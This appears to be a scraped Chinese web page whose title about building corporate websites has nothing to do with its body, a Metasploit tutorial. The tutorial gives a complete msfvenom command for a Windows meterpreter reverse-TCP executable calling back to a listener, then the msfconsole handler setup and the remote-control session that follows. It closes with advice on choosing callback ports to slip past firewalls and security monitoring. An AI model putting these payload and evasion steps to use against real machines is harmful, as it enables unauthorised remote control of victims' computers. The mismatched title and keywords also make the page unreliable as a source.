企业官网建设流程全解析

网站后台模板如何使用,wordpress搬家修改域名,做网站内容图片多大,wordpress cdn配置Metasploit 是一款开源的渗透测试与漏洞利用框架#xff0c;由 Rapid7 公司维护#xff0c;是信息安全领域#xff08;尤其是渗透测试、漏洞研究#xff09;最常用的工具之一。它的核心功能是帮助安全人员合法地模拟黑客攻击#xff0c;以评估目标系统的安全性#xff0c…Metasploit 是一款开源的渗透测试与漏洞利用框架由 Rapid7 公司维护是信息安全领域尤其是渗透测试、漏洞研究最常用的工具之一。它的核心功能是帮助安全人员合法地模拟黑客攻击以评估目标系统的安全性发现并修复潜在漏洞。生成payload例如msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.113.136 lport5000 -f exe -o /root/payload.exe其中参数Msfvenom用于生成恶意payload的工具用到参数-p、-f、-o-p, –payload Payload to use;指定哪些有效载荷生成本例中 windows/meterpreter/reverse_tcp 用于Windows平台的反向远程控制程序-f, –format Output format;指定有效载荷的格式本例中 exe 生成Windows系统的可执行文件-o, –out Save the payload;指定保存位置本例中 /root/payload.exeLHOST是 “Local Host” 的缩写指控制端这里是 Kali Linux 主机的 IP 地址图中为192.168.113.136。目标主机运行生成的payload.exe后会主动向这个 IP 发起连接从而建立控制会话。LPORT是 “Local Port” 的缩写指控制端监听的端口图中为5000。Kali 需在这个端口上启动监听程序等待目标主机的连接请求。图示为成功生成了在5000端口运行的payload。开启metasploit的交互式命令控制台msfconsole进行配置配置payloadwindows/meterpreter/reverse_tcp配置lhostkali ip配置lport5000如图所示为配置好的payload键入run开启监听。如图所示为生成的payload使用文件传输命令将其从http下载到本机Windowswindows开始运行payload.exe后看到kali命令行中成功连接信息此时我们就可以通过meterpreter对目标Windows系统进行远程控制了。关于监听端口的选择在渗透测试中选择监听端口LPORT需要综合考虑可用性、隐蔽性、目标环境限制等因素以下是具体原则和建议一、监听端口选择的核心原则避免常用系统端口不要选择1-1024范围内的知名端口如80HTTP、443HTTPS、22SSH 等这些端口可能被目标防火墙默认放行但也可能被控制端本地服务占用或被安全设备标记为 “高风险端口”。优先选择1024-65535的非知名端口如4444、5555、8888等降低被检测的概率。避开目标环境的拦截规则若已知目标防火墙 / 安全组的策略选择其放行的端口例如目标允许8080、3389等端口的出站流量则可优先选这些端口。避免目标常用的 “黑名单端口”如部分企业会拦截4444、5555等渗透测试常用端口。确保控制端本地端口未被占用选择前可先用netstat -tulpn | grep端口号检查 Kali 本地是否已占用该端口避免端口冲突导致监听失败。二、推荐的常用监听端口渗透测试常用相对隐蔽且少被占用4444、5555、6666、8888、9999仿合法服务端口增强隐蔽性8080仿 HTTP 服务、8443仿 HTTPS 服务、1080仿代理服务随机高端口直接选择10000-60000之间的随机端口如23456、34567进一步降低被识别的概率。三、注意事项同一控制端同时监听多个 payload 时需使用不同的 LPORT避免端口冲突若目标有严格的出站端口限制可尝试使用443HTTPS、80HTTP等 “通用放行端口”但需确保控制端本地未占用这些端口。